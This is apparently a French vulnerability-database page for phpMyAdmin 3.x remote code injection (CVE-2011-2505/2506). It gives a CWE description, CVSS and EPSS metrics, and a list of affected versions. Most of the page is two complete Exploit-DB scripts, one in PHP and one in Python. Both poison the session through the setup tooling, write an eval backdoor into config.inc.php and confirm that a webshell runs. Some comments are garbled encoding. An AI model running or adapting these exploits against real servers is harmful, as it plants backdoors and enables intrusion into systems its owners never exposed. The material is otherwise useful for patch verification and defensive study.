Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
6.4 |
|
AV:N/AC:L/Au:N/C:N/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 17514
Date de publication : 2011-07-08 22h00 +00:00
Auteur : Mango
EDB Vérifié : Yes
<?php /*
# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
# Date: 2011-07-09
# Author: Mango of ha.xxor.se
# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
# CVE : CVE-2011-2505, CVE-2011-2506
# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
*/
echo php_sapi_name()!=='cli'?'<pre>':'';?>
.
, )\ .
. ,/) , / ) , )\
)\( /)/( (__( /( / ) __ __ ________ __ __
/ \ ( )| |) \ / | |\ /| | | | | | | | (__)
( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____
\| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | |
| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|
==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []
Remote Code Injection [] [][] [] [] [] [] [] []
http://ha.xxor.se [][] [] [] [] [][] [][] [] []
_ _ ___ __ ____ __ ___ ___
| |-| || _ |\ /\ /| _ || )
|_|-|_||_|_|/_._\/_._\|___||_|_\
___ ___ ___ _ _ ___ ___ __ __
( < | [_ / /| || || )(_)| |\ | /
>__)|_[_ \__\|____||_|_\|_| |_| |_|
Use responsibly.
<?php echo php_sapi_name()!=='cli'?'</pre>':'';
if(php_sapi_name()==='cli'){
if(!isset($argv[1])){
output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token = null;
if(!function_exists('curl_init')){
output('[!] Fatal error. Need cURL!');
killme();
}
$ch = curl_init();
$debug = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}
output("[i] Running...");
// Start a session and get a token
curl_setopt_array($ch, array(
CURLOPT_URL => $pmaurl.'/setup/index.php',
CURLOPT_HEADER => 1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");
$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
killme();
}
if(!$result){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
killme();
}
// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);
// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
//echo htmlspecialchars($result,ENT_QUOTES);
// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
//echo htmlspecialchars($result,ENT_QUOTES);
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}
curl_close($ch);
function output($msg){
echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
flush();
}
function killme(){
output("[*] Exiting...");
echo php_sapi_name()!=='cli'?'<pre>':'';
die();
}
echo php_sapi_name()!=='cli'?'<pre>':'';?>
Exploit Database EDB-ID : 17510
Date de publication : 2011-07-07 22h00 +00:00
Auteur : wofeiwo
EDB Vérifié : Yes
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. "config" directory must created&writeable in pma directory.
# 2. session.auto_start = 1 in php.ini configuration.
import os,sys,urllib2,re
def usage(program):
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
print "Usage: %s <PMA_url>" % program
print "Example: %s http://www.test.com/phpMyAdmin" % program
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
if args[1][-1] == "/":
args[1] = args[1][:-1]
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
print "[+] Trying get form token&session_id.."
content = urllib2.urlopen(args[1]+"/index.php").read()
r1 = re.findall("token=(\w{32})", content)
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
if not r1:
r1 = re.findall("token\" value=\"(\w{32})\"", content)
if not r2:
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
if len(r1) < 1 or len(r2) < 1:
print "[-] Cannot find form token and session id...exit."
sys.exit(-1)
token = r1[0]
sessionid = r2[0]
print "[+] Token: %s , SessionID: %s" % (token, sessionid)
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
print "[+] Trying to insert payload in $_SESSION.."
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
url = args[1]+uri
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
urllib2.install_opener(opener)
urllib2.urlopen(url)
# ����setup��ȡshell
print "[+] Trying get webshell.."
postdata =
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
% (sessionid, token)
url = args[1]+"/setup/config.php"
# print "[+]Postdata: %s" % postdata
urllib2.urlopen(url, postdata)
print "[+] All done, pray for your lucky!"
# ���IJ����������shell
url = args[1]+"/config/config.inc.php"
opener.addheaders.append(('Code', 'phpinfo();'))
urllib2.install_opener(opener)
print "[+] Trying connect shell: %s" % url
result = re.findall("System \</td\>\<td
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
if len(result) == 1:
print "[+] Lucky u! System info: %s" % result[0]
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
else:
print "[-] Cannot get webshell."
except Exception, e:
print e
if __name__ == "__main__" : main(sys.argv)
Products Mentioned
Configuraton 0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.1
Phpmyadmin>>Phpmyadmin >> Version 3.0.1
Phpmyadmin>>Phpmyadmin >> Version 3.0.1.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.1.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.2
Phpmyadmin>>Phpmyadmin >> Version 3.1.2
Phpmyadmin>>Phpmyadmin >> Version 3.1.3
Phpmyadmin>>Phpmyadmin >> Version 3.1.3
Phpmyadmin>>Phpmyadmin >> Version 3.1.3.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.3.2
Phpmyadmin>>Phpmyadmin >> Version 3.1.4
Phpmyadmin>>Phpmyadmin >> Version 3.1.4
Phpmyadmin>>Phpmyadmin >> Version 3.1.5
Phpmyadmin>>Phpmyadmin >> Version 3.1.5
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.2.1
Phpmyadmin>>Phpmyadmin >> Version 3.2.1
Phpmyadmin>>Phpmyadmin >> Version 3.2.2
Phpmyadmin>>Phpmyadmin >> Version 3.2.2
Phpmyadmin>>Phpmyadmin >> Version 3.3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.3.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.4.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.5.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.5.1
Phpmyadmin>>Phpmyadmin >> Version 3.3.6
Phpmyadmin>>Phpmyadmin >> Version 3.3.7
Phpmyadmin>>Phpmyadmin >> Version 3.3.8
Phpmyadmin>>Phpmyadmin >> Version 3.3.8.1
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.1
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.2
Phpmyadmin>>Phpmyadmin >> Version 3.3.10.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.10.1
Configuraton 0
Phpmyadmin>>Phpmyadmin >> Version 3.4.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.4.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.4.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.4.3.0
Références